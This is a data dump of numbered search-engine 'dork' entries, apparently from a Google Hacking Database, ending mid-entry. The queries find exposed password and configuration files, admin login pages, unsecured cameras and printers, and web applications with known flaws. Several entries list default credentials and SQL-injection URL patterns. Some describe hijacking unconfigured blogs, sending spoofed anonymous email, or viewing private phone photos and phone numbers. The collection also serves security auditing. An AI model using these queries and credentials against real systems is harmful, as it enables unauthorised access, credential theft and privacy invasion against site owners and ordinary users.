It can be used to gain access to a Patch Deployment server. If you successfully login to that server you can possibly compromise all the other network servers.
[descr]]
[[url]http://www.google.com/search?q=inurl%3A%2FSUSAdmin+intitle%3A%22Microsoft+Software+Update+Services%22&btnG=Search[url]]
[[dork]inurl:/SUSAdmin intitle:"Microsoft Software Update Services"[dork]]
[end][1290]]
[[start][1291]
[[title]intitle:"Netopia Router (*.)""to view this site"[title]]
[[descr]Web admin for netopia routers
This Web tool provides access to information about the current status of your router and connections. [descr]]
[[url]http://www.google.com/search?q=intitle:%22Netopia+Router+(*.)%22%22to+view+this+site%22&filter=0[url]]
[[dork]intitle:"Netopia Router (*.)""to view this site"[dork]]
[end][1291]]
[[start][1296]
[[title]intitle:"VisNetic WebMail" inurl:"/mail/"[title]]
[[descr]VisNetic WebMail is a built-in web mail server that allows VisNetic Mail Server account holders to access their email messages, folders and address books from any standard web browser on an Internet enabled computer.[descr]]
[[url]http://www.google.com/search?q=intitle:%22VisNetic+WebMail%22+inurl:%22/mail/%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"VisNetic WebMail" inurl:"/mail/"[dork]]
[end][1296]]
[[start][1297]
[[title]inurl:perform.ini filetype:ini[[title]]
[[descr]mIRC Passwords For Nicks & Channels
in channel\[chanfolder] section of mirc.ini you can find 2 type of "private" information - secret channels (that is +ps is not listed everythere) and password protected channels - passwords stored in plaintext)
[descr]]
[[url]http://www.google.com/search?q=inurl:perform.ini+filetype:ini[url]]
[[dork]inurl:perform.ini filetype:ini[dork]]
[end][1297]]
[[start][1298]
[[title](cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp[[title]]
[[descr]Kpix Java Based Traffic Cameras. Based at CBS broadcasting for San Fransisco, Oakland, and San Jose.[descr]]
[[url]http://www.google.com/search?q=(cam1java)%7C(cam2java)%7C(cam3java)%7C(cam4java)%7C(cam5java)%7C(cam6java)+-navy.mil+-backflip+-power.ne.jp&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork](cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp[dork]]
[end][1298]]
[[start][1299]
[[title]allintitle:"Welcome to the Cyclades"[title]]
[[descr]This search reveals the login page for the Cyclades TS1000 and TS2000 Web Management Service. The Cyclades TS1000 and TS200 devices are Console servers, based on a cut down Linux version. These lovely devices sit on the network with console cables attached to them, so that you then gain access to this device, and then have console access to any of the hosts connected to the console ports. :-)
The default username and password for these devices is, root/tslinux.
This query currently only returns pages available in Google's cache (but in the future more devices may be returned).[descr]]
[[url]http://www.google.com/search?hl=en&q=allintitle%3A%22Welcome+to+the+Cyclades%22&btnG=Google+Search&meta=[url]]
[[dork]allintitle:"Welcome to the Cyclades"[dork]]
[end][1299]]
[[start][1301]
[[title]intext:"Powered by X-Cart: shopping cart software" -site:x-cart.com[[title]]
[[descr]X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn't seem to be any way to search for specific versions of the software with Google. See http://www.securitytracker.com/alerts/2005/May/1014077.html for more information.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=intext%3A%22Powered+by+X-Cart%3A+shopping+cart+software%22+-site%3Ax-cart.com&btnG=Search[url]]
[[dork]intext:"Powered by X-Cart: shopping cart software" -site:x-cart.com[dork]]
[end][1301]]
[[start][1302]
[[title]intitle:"PowerDownload" ("PowerDownload v3.0.2 ©" | "PowerDownload v3.0.3 ©" ) -site:powerscripts.org[[title]]
[[descr]The PowerDownload program (version 3.0.2 and 3.0.3) contains a serious vulnerability. Vulnerability discovery: SoulBlack - Security Research (http://soulblack.com.ar)
Date: 05/31/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: v3.0.2 & v3.0.3
vendor: http://www.powerscripts.org/
* Fix *
Contact the Vendor
* References *
http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt[descr]]
[[url]http://www.google.com/search?q=intitle:%22PowerDownload%22+(%22PowerDownload+v3.0.2+©%22+%7C+%22PowerDownload+v3.0.3+©%22+)+-site:powerscripts.org[url]]
[[dork]intitle:"PowerDownload" ("PowerDownload v3.0.2 ©" | "PowerDownload v3.0.3 ©" ) -site:powerscripts.org[dork]]
[end][1302]]
[[start][1303]
[[title]intitle:"PHPstat" intext:"Browser" intext:"PHPstat setup"[title]]
[[descr]Phpstat shows nice statistical informatino about a website's visitors. Certain versions are also contain vulnerabilities: http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&q=intitle%3A%22PHPstat%22+intext%3A%22Browser%22+intext%3A%22PHPstat+setup%22&btnG=Search[url]]
[[dork]intitle:"PHPstat" intext:"Browser" intext:"PHPstat setup"[dork]]
[end][1303]]
[[start][1304]
[[title]"portailphp v1.3" inurl:"index.php?affiche" inurl:"PortailPHP" -site:safari-msi.com[[title]]
[[descr]Vulnerability has been found in parameter "id". If this variable
Any value it is possible to replace it with a sign ' is transferred
Since this parameter is involved in all modules, all of them
Are vulnerable.
It occurs because of absence of a filtration of parameter id.
Examples
http://example/index.php?affiche=News&id='[SQL inj]
http://example/index.php?affiche=File&id='[SQL inj]
http://example/index.php?affiche=Liens&id='[SQL inj]
http://example/index.php?affiche=Faq&id='[SQL inj]
The conclusion
Vulnerability is found out in version 1.3, on other versions
Did not check. Probably they too are vulnerable. [descr]]
[[url]http://www.google.com/search?q=%22portailphp+v1.3%22+inurl:%22index.php%3Faffiche%22+inurl:%22PortailPHP%22+-site:safari-msi.com&filter=0[url]]
[[dork]"portailphp v1.3" inurl:"index.php?affiche" inurl:"PortailPHP" -site:safari-msi.com[dork]]
[end][1304]]
[[start][1305]
[[title]+intext:"powered by MyBulletinBoard"[title]]
[[descr]MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. There is an SQL Injection Exploit available for MyBulletinBoard (MyBB) <= 1.00 RC4 Related advisory:
Patch: http://www.mybboard.com/community/showthread.php?tid=2559
http://fain182.badroot.org
http://www.codebug.org
Discovered by Alberto Trivero and coded with FAiN182
More Details: http://www.milw0rm.com/id.php?id=1022[descr]]
[[url]http://www.google.com/search?q=%2Bintext%3A%22powered+by+MyBulletinBoard%22&btnG=Search&hl=en&lr=&safe=off&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial[url]]
[[dork]+intext:"powered by MyBulletinBoard"[dork]]
[end][1305]]
[[start][1306]
[[title]inurl:"S=320x240" | inurl:"S=160x120" inurl:"Q=Mobile"[title]]
[[descr]Mobile cameras? Not sure what camera type this is for but they are all from Asia and no password is required to view them.. multiple cams and camera views. The &N=* at the end of the URL changes the language of the camera control links, &N=0 is english.
This is a slightly modified version of WarChylde's query, which gives more results.[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22S%3D320x240%22+%7C+inurl%3A%22S%3D160x120%22+inurl%3A%22Q%3DMobile%22[url]]
[[dork]inurl:"S=320x240" | inurl:"S=160x120" inurl:"Q=Mobile"[dork]]
[end][1306]]
[[start][1307]
[[title]intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin[[title]]
[[descr]This query reveals login pages for the administration of XcAuction and XcClassified Lite..
"XcAuction is a powerful and complete auction package that allows you to add auction capabilities to any web site."
"XcClassified allows you to offer free or fee based classified ads to your site visitors. It integrates easily into your existing web site design and offers many features."descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1307]]
[[start][1308]
[[title]inurl:XcCDONTS.asp[[title]]
[[descr]This query reveals an .asp script which can often be used to send anonymous emails from fake senders. When combined with a proxy, the usefulness of these scripts is obvious![descr]]
[[url]http://www.google.com/search?q=inurl%3AXcCDONTS.asp[url]]
[[dork]inurl:XcCDONTS.asp[dork]]
[end][1308]]
[[start][1309]
[[title]intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"[title]]
[[descr]This will search for usernames and passwords for steam (www.steampowered.com) taken from the SteamApp.cfg file.[descr]]
[[url]http://www.google.com/search?q=intext:%22SteamUserPassphrase%3D%22+intext:%22SteamAppUser%3D%22+-%22username%22++-%22user%22&filter=0[url]]
[[dork]intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"[dork]]
[end][1309]]
[[start][1311]
[[title]inurl:"CgiStart?page="[title]]
[[descr]This search reveals even more Panasonic IP cameras![descr]]
[[url]http://www.google.com/search?hl=en&lr=&rls=GGLG%2CGGLG%3A2005-22%2CGGLG%3Aen&q=inurl%3A%22CgiStart%3Fpage%3D%22&btnG=Search[url]]
[[dork]inurl:"CgiStart?page="[dork]]
[end][1311]]
[[start][1312]
[[title]intext:"Powered by flatnuke-2.5.3" +"Get RSS News" -demo[[title]]
[[descr]Description of Vulnerabilities
Multiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system information.
If the "/flatnuke/foot_news.php" script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation.
[..]
User-supplied input passed to the "image" parameter in the "thumb.php" script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path.
It is also possible to disclose the system path by accessing certain scripts directly or specially formed parameters.[descr]]
[[url]http://www.google.com/search?q=intext%3A%22Powered+by+flatnuke-2.5.3%22+%2B%22Get+RSS+News%22+-demo[url]]
[[dork]intext:"Powered by flatnuke-2.5.3" +"Get RSS News" -demo[dork]]
[end][1312]]
[[start][1315]
[[title]inurl:pass.dat[[title]]
[[descr]Accesses passwords mostly in cgibin but not all the time
Can find passwords + usernames (sometimes username), some unecrypted some not[descr]]
[[url]http://www.google.com/search?q=filetype%3Adat+inurl%3Apass.dat&btnG=Search[url]]
[[dork]filetype:dat inurl:pass.dat[dork]]
[end][1315]]
[[start][1316]
[[title]intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee[[title]]
[[descr]This gives results for hosting plans that don't have associated fees, so anyone can sign up with false information and no credit card details[descr]]
[[url]http://www.google.com/search?num=100&q=intext%3A%22Welcome+to%22+inurl%3A%22cp%22+intitle%3A%22H-SPHERE%22+inurl%3A%22begin.html%22+-Fee[url]]
[[dork]intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee[dork]]
[end][1316]]
[[start][1317]
[[title]intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"[title]]
[[descr]This will look throught default phpinfo pages for ones that have a default mysql password.[descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3A%22phpinfo%28%29%22+%2B%22mysql.default_password%22+%2B%22Zend+Scripting+Language+Engine%22[url]]
[[dork]intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"[dork]]
[end][1317]]
[[start][1318]
[[title]intitle:"configuration" inurl:port_0[[title]]
[[descr]More dell and lexmark printers, The usual things included.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22configuration%22+inurl%3Aport_0&btnG=Search[url]]
[[dork]intitle:"configuration" inurl:port_0[dork]]
[end][1318]]
[[start][1319]
[[title]intitle:"Dell Laser Printer M5200" port_0[[title]]
[[descr]Dell Laser Printer M5200[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&as_qdr=all&q=intitle%3A%22Dell+Laser+Printer+M5200%22+port_0&btnG=Search[url]]
[[dork]intitle:"Dell Laser Printer M5200" port_0[dork]]
[end][1319]]
[[start][1320]
[[title]printers/printman.html[[title]]
[[descr]Some interesting information on printer status including Name, Location, Model, Pagecount, Action, Status. This summary page also presents several printers in one list, and the status logs reveal more sensitive information like email addresses.[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=printers%2Fprintman.html&btnG=Google+Search[url]]
[[dork]printers/printman.html[dork]]
[end][1320]]
[[start][1321]
[[title]"RICOH Network Printer D model-Restore Factory"[title]]
[[descr]Not a whole lot here.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22RICOH+Network+Printer+D+model-Restore+Factory%22&btnG=Search[url]]
[[dork]"RICOH Network Printer D model-Restore Factory"[dork]]
[end][1321]]
[[start][1322]
[[title]intitle:"GCC WebAdmin" -gcc.ru[[title]]
[[descr]All sorts of various printer status information[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22GCC+WebAdmin%22+-gcc.ru&btnG=Search[url]]
[[dork]intitle:"GCC WebAdmin" -gcc.ru[dork]]
[end][1322]]
[[start][1323]
[[title]intitle:"XMail Web Administration Interface" intext:Login intext:password[[title]]
[[descr]This search will find the Web Administration Interface for servers running XMail.
"XMail is an Internet and intranet mail server featuring an SMTP server, POP3 server, finger server, multiple domains, no need for users to have a real system account, SMTP relay checking", etc...[descr]]
[[url]http://www.google.com/search?q=intitle:%22XMail+Web+Administration+Interface%22+intext:Login+intext:password[url]]
[[dork]intitle:"XMail Web Administration Interface" intext:Login intext:password[dork]]
[end][1323]]
[[start][1324]
[[title]intitle:"AXIS 240 Camera Server" intext:"server push" -help[[title]]
[[descr]This search finds AXIS 240 Camera Servers (as opposed to just the cameras) which can host many cameras, that may not be found in other searches, since they are not necessarily IP based.[descr]]
[[url]http://www.google.com/search?q=intitle:%22AXIS+240+Camera+Server%22+intext:%22server+push%22+-help&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-US:official&start=10&sa=N&filter=0[url]]
[[dork]intitle:"AXIS 240 Camera Server" intext:"server push" -help[dork]]
[end][1324]]
[[start][1325]
[[title]"html allowed" guestbook[[title]]
[[descr]When this is typed in google it finds websites which have HTML Enabled guestbooks.
This is really stupid as users could totally mess up their guestbook by adding commands like <![CDATA[ or adding a loop javascript pop-up[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22html+allowed%22+guestbook&btnG=Search[url]]
[[dork]"html allowed" guestbook[dork]]
[end][1325]]
[[start][1326]
[[title]"Status message received from" intitle:big brother[[title]]
[[descr]This search will help you find server stats and reports via big brother. Lots of information can be gained from the reports. An attacker can use this information to help him in planning his attacks.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1326]]
[[start][1327]
[[title]intext:"Powered By: Snitz Forums 2000 Version 3.4.00..03"[title]]
[[descr]Snitz Forum 2000 v 3.4.03 and older is vulnerable to many things including XSS. See http://www.gulftech.org/?node=research&article_id=00012-06162003. This is a sketchy search, finding vulnerable versions 3.4.00-3.4.03. Older versions are vulnerable as well.[descr]]
[[url]http://www.google.com/search?num=100&safe=off&q=intext%3A%22Powered+By%3A+Snitz+Forums+2000+Version+3.4.00..03%22&btnG=Search[url]]
[[dork]intext:"Powered By: Snitz Forums 2000 Version 3.4.00..03"[dork]]
[end][1327]]
[[start][1328]
[[title]filetype:QBW qbw[[title]]
[[descr]Quickbooks is software to manage your business's financials. Invoicing, banking, payroll, etc, etc. Its a nice software package but their files (.qbw) are simply password protected in most cases and online programs may be available to remove password protection. <br>
<br>
SSNs (depending on the company), account numbers of employees for direct deposit, customer lists, etc may be available. This could lead to identity theft, or worse...[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&biw=1400&q=filetype%3AQBW+qbw&btnG=Search[url]]
[[dork]filetype:QBW qbw[dork]]
[end][1328]]
[[start][1329]
[[title]inurl:cgi-bin inurl:calendar.cfg[[title]]
[[descr]CGI Calendar (Perl) configuration file reveals information including passwords for the program.<br>
[descr]]
[[url]http://www.google.com/search?q=inurl%3Acgi-bin+inurl%3Acalendar.cfg[url]]
[[dork]inurl:cgi-bin inurl:calendar.cfg[dork]]
[end][1329]]
[[start][1330]
[[title]inurl:"/login.asp?folder=" "Powered by: i-Gallery 3.3"[title]]
[[descr]i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals.<br>
http://www.packetstormsecurity.org/0506-exploits/igallery33.txt[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22%2Flogin.asp%3Ffolder%3D%22+%22Powered+by%3A+i-Gallery+3.3%22[url]]
[[dork]inurl:"/login.asp?folder=" "Powered by: i-Gallery 3.3"[dork]]
[end][1330]]
[[start][1331]
[[title]intext:"Calendar Program © Copyright 1999 Matt Kruse" "Add an event"[title]]
[[descr]This search finds all pages that allow you to add events in Mark Kruse's CalendarScript. This script seems to be VERY vulnerable to HTML injection techniques.[descr]]
[[url]http://www.google.com/search?q=intext%3A%22Calendar+Program+%C2%A9+Copyright+1999+Matt+Kruse%22+%22Add+an+event%22&btnG=Search[url]]
[[dork]intext:"Calendar Program © Copyright 1999 Matt Kruse" "Add an event"[dork]]
[end][1331]]
[[start][1332]
[[title]intitle:"Login to Cacti"[title]]
[[descr]Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&biw=1003&q=intitle%3A%22Login+to+Cacti%22[url]]
[[dork]intitle:"Login to Cacti"[dork]]
[end][1332]]
[[start][1333]
[[title]"set up the administrator user" inurl:pivot[[title]]
[[descr]Using this, you can find sites with a Pivot weblog installed but not set up. The default set up screen on Pivot has you create an administrator account, so, using this, you can create an account on someone else's weblog, post, and manage the blog.[descr]]
[[url]http://www.google.com/search?q=%22set+up+the+administrator+user%22+inurl%3Apivot[url]]
[[dork]"set up the administrator user" inurl:pivot[dork]]
[end][1333]]
[[start][1334]
[[title]inurl:textpattern/index.php[[title]]
[[descr]Login portal for textpattern a CMS/Blogger tool.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1334]]
[[start][1335]
[[title]tilt intitle:"Live View / - AXIS" | inurl:view/view.shtml[[title]]
[[descr]A small modification to the AXIS camera search - it now returns cameras with pan / tilt, which is much more fun![descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=tilt+intitle%3A%22Live+View+%2F+-+AXIS%22+%7C+inurl%3Aview%2Fview.shtml&btnG=Search[url]]
[[dork]tilt intitle:"Live View / - AXIS" | inurl:view/view.shtml[dork]]
[end][1335]]
[[start][1336]
[[title] site:pictures.sprintpcs.com "picture.do;jsessionid="[title]]
[[descr]Searches the sprint pcs site for shared cell phone pics and movies. The returned search returns movies, pics, and email addresses. <br>
<br>
some Sprint pcs email addresses are actually the cell phone numbers. email addresses apearing like 123456789@messaging.sprintpcs.com = "not a real one" would be the cell phone number (123)-456-6789 of that user.<br>
<br>
secondary google Searching: site:pictures.sprintpcs.com "large.do;jsessionid="<br>
<br>
will return photo albums with out the added personal info on the users.<br>
<br>
This can just be used for information gathering.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=+site%3Apictures.sprintpcs.com++%22picture.do%3Bjsessionid%3D%22&btnG=Search[url]]
[[dork] site:pictures.sprintpcs.com "picture.do;jsessionid="[dork]]
[end][1336]]
[[start][1337]
[[title]"powered by PhpBB 2.0.15" -site:phpbb.com[[title]]
[[descr]Another php vulnerabilty, as seen here http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.php<br>
<br>
phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability<br>
This exploit gives the user all the details about the database<br>
connection such as database host, username, password and<br>
database name.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+PhpBB+2.0.15%22+-site%3Aphpbb.com&btnG=Search[url]]
[[dork]"powered by PhpBB 2.0.15" -site:phpbb.com[dork]]
[end][1337]]
[[start][1338]
[[title]filetype:PS ps[[title]]
[[descr]PS is for "postscript"...which basically means you get the high quality press data for documents. Just run 'adobe distiller' or alike to produce a readable PDF. Found items include complete books as sold on amazon, annual reports and even juicier stuff.[descr]]
[[url]http://www.google.com/search?hl=en&q=filetype%3APS+ps[url]]
[[dork]filetype:PS ps[dork]]
[end][1338]]
[[start][1342]
[[title]"You have requested access to a restricted area of our website. Please authenticate yourself to continue."[title]]
[[descr]Background<br>
<br>
EasySite is a Content Management System (CMS) build on PHP and MySQL. Many easysite servers still use the default username and password, however all of them have been contacted about this problem.[descr]]
[[url]http://www.google.com/search?q=%22You+have+requested+access+to+a+restricted+area+of+our+website.+Please+authenticate+yourself+to+continue.%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]"You have requested access to a restricted area of our website. Please authenticate yourself to continue."[dork]]
[end][1342]]
[[start][1343]
[[title]intitle:"pictures thumbnails" site:pictures.sprintpcs.com[[title]]
[[descr]This search reveals the photo albums taken by Sprint PCS customers. Pictures taken with Sprint's cell phone service can be shared on their website. <br>
This search exposes the thumbnail album, only if the user has elected to share the photo album.<br>
<br>
Nothing like the Paris Hilton pictures, but there are pictures of people drunk at parties, dancing, girlfriens and so on.[descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3A%22pictures+thumbnails%22+site%3Apictures.sprintpcs.com[url]]
[[dork]intitle:"pictures thumbnails" site:pictures.sprintpcs.com[dork]]
[end][1343]]
[[start][1345]
[[title]allinurl:cdkey.txt[[title]]
[[descr]cdkeys[descr]]
[[url]http://www.google.com/search?q=allinurl%3Acdkey.txt[url]]
[[dork]allinurl:cdkey.txt[dork]]
[end][1345]]
[[start][1346]
[[title]intitle:"TANDBERG" "This page requires a frame capable browser!"[title]]
[[descr]Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously. [descr]]
[[url]http://www.google.com/search?q=intitle:%22TANDBERG%22+%22This+page+requires+a+frame+capable+browser!%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"TANDBERG" "This page requires a frame capable browser!"[dork]]
[end][1346]]
[[start][1347]
[[title]intitle:"Middle frame of Videoconference Management System" ext:htm[[title]]
[[descr]Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Middle+frame+of+Videoconference+Management+System%22+ext%3Ahtm&btnG=Search[url]]
[[dork]intitle:"Middle frame of Videoconference Management System" ext:htm[dork]]
[end][1347]]
[[start][1348]
[[title]intitle:"Veo Observer Web Client"[title]]
[[descr]Another online camera search. This one uses ActiveX thingies, so you need a M$ browser. Append "LGI_en.htm" to the URL for the english version. The embedded webserver is called Ubicom/1.1. Defaults are admin/password. The manual very cleary warns owners to change that. <br>
<br>
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Veo+Observer+Web+Client%22&btnG=Search[url]]
[[dork]intitle:"Veo Observer Web Client"[dork]]
[end][1348]]
[[start][1349]
[[title]intitle:"TOPdesk ApplicationServer"[title]]
[[descr]Topdesk is some kind of incident ticket system with a webinterface. It requires: Windows 98 and Windows NT, Windows 2000, Windows XP, OS/2. It installs a webserver called: Jetty/4.2.2 and the default password (operator login) is admin/admin. The HTTP server header reveals the OS it's running on.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22TOPdesk+ApplicationServer%22&btnG=Search[url]]
[[dork]intitle:"TOPdesk ApplicationServer"[dork]]
[end][1349]]
[[start][1350]
[[title]intitle:"Welcome to Mailtraq WebMail"[title]]
[[descr]Mailtraq WebMail is just another a web-based e-mail client. This is the login page.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Welcome+to+Mailtraq+WebMail%22[url]]
[[dork]intitle:"Welcome to Mailtraq WebMail"[dork]]
[end][1350]]
[[start][1351]
[[title]intitle:"Java Applet Page" inurl:ml[[title]]
[[descr]Another Standalone Network Camera.<br>
<br>
Default Login: remove wg_jwebeye.ml to get a nice clue ..<br>
Server: wg_httpd/1.0(based Boa/0.92q) <br>
[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22Java+Applet+Page%22+inurl%3Aml+&num=100[url]]
[[dork]intitle:"Java Applet Page" inurl:ml [dork]]
[end][1351]]
[[start][1352]
[[title]intitle:"WEBDVR" -inurl:product -inurl:demo[[title]]
[[descr]DVR is a generic name used to describe the recording process with a digital cam (digitial video recording). This search finds several manufactors like Kodicom DVR Systems, i3 DVR, and others I can't identify.[descr]]
[[url]http://www.google.com/search?q=intitle:%22WEBDVR%22+-inurl:product+-inurl:demo&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"WEBDVR" -inurl:product -inurl:demo[dork]]
[end][1352]]
[[start][1353]
[[title]"This section is for Administrators only. If you are an administrator then please"[title]]
[[descr]Nothing special, just one more set of login pages, but the "Administrators only" line is a classic.[descr]]
[[url]http://www.google.com/search?q=%22This+section+is+for+Administrators+only.+If+you+are+an+administrator+then+please%22&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0[url]]
[[dork]"This section is for Administrators only. If you are an administrator then please"[dork]]
[end][1353]]
[[start][1354]
[[title]intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi[[title]]
[[descr]Pretty standered login pages, they all have various differences but it appears that they use the same script or software.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Member+Login%22+%22NOTE:+Your+browser+must+have+cookies+enabled+in+order+to+log+into+the+site.%22+ext:php+OR+ext:cgi&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi[dork]]
[end][1354]]
[[start][1355]
[[title]site:www.mailinator.com inurl:ShowMail.do[[title]]
[[descr]Mailinator.com allows people to use temporary email boxes. Read the site, I won't explain here. Anyway, there are emails in this site that have no password protection and potentially contain usernames, passwords, and email data. The only lock against unwanted viewers is the email address which can be randomized. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=site%3Awww.mailinator.com+inurl%3AShowMail.do[url]]
[[dork]site:www.mailinator.com inurl:ShowMail.do[dork]]
[end][1355]]
[[start][1356]
[[title]filetype:mdb "standard jet"[title]]
[[descr]These Microsoft Access Database files may contain usernames, passwords or simply prompts for such data.[descr]]
[[url]http://www.google.com/search?q=filetype%3Amdb+%22standard+jet%22+%28password+%7C+username+%7C+user+%7C+pass%29&btnG=Search[url]]
[[dork]filetype:mdb "standard jet" (password | username | user | pass)[dork]]
[end][1356]]
[[start][1357]
[[title]inurl:"default/login.php" intitle:"kerio"[title]]
[[descr]This dork reveals login pages for Kerio Mail server. Kerio MailServer is a state-of-the-art groupware server allowing companies to collaborate via email, shared contacts, shared calendars and tasks. Download can be found here http://www.kerio.com/kms_download.html.[descr]]
[[url]http://www.google.com/search?as_q=intitle%3Akerio&num=100&hl=en&c2coff=1&btnG=Google+Search&as_epq=inurl%3Adefault+login+php+&as_oq=&as_eq=&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images[url]]
[[dork]intitle:kerio[dork]]
[end][1357]]
[[start][1358]
[[title]ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential[[title]]
[[descr]Although this search is a bit broken (the file extensions don't always work), it reveals interesting-looking documents which may contain potentially confidential information. [descr]]
[[url]http://www.google.com/search?q=ext:(doc+%7C+pdf+%7C+xls+%7C+txt+%7C+ps+%7C+rtf+%7C+odt+%7C+sxw+%7C+psw+%7C+ppt+%7C+pps+%7C+xml)+(intext:confidential+salary+%7C+intext:%22budget+approved%22)+inurl:confidential[url]]
[[dork]ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential[dork]]
[end][1358]]
[[start][1359]
[[title][WFClient] Password= filetype:ica[[title]]
[[descr]The WinFrame-Client infos needed by users to connect to<br>
Citrix Application Servers (e.g. Metaframe).<br>
Often linked/stored on Webservers and sometimes reachable from Internet.<br>
Password is 16-byte-Hash of unknown encryption (MSCHAPv2 ?).<br>
File Extension is "ica" the so called Citrix® Independent Computing Architecture.<br>
<br>
These files may contain login information (Username, Password, Domain).[descr]]
[[url]http://www.google.com/search?q=%5BWFClient%5D+Password%3D+filetype%3Aica[url]]
[[dork][WFClient] Password= filetype:ica[dork]]
[end][1359]]
[[start][1360]
[[title]intitle:"V1" "welcome to phone settings" password[[title]]
[[descr]This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.<br>
<br>
Depending on the version of firmware preinstalled on your IP Box, the password to get into the setting pages may be either 12345678 or 87654321. [descr]]
[[url]http://www.google.com/search?q=intitle:%22V1%22+%22welcome+to+phone+settings%22+password&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"V1" "welcome to phone settings" password[dork]]
[end][1360]]
[[start][1361]
[[title]intitle:"HP ProCurve Switch *" "This product requires a frame capable browser."[title]]
[[descr]HP ProCurve Switch web management pages, found by their [noscript] html tags. Please note: this search only gives results from certain source IP addresses and I can't tell you why (check forum topic number 2609 for details).[descr]]
[[url]http://www.google.com/search?q=intitle:%22HP+ProCurve+Switch+*%22+%22This+product+requires+a+frame+capable+browser.%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"HP ProCurve Switch *" "This product requires a frame capable browser."[dork]]
[end][1361]]
[[start][1362]
[[title]"Powered by Gravity Board"[title]]
[[descr]4.22 07/08/2005 <br>
<br>
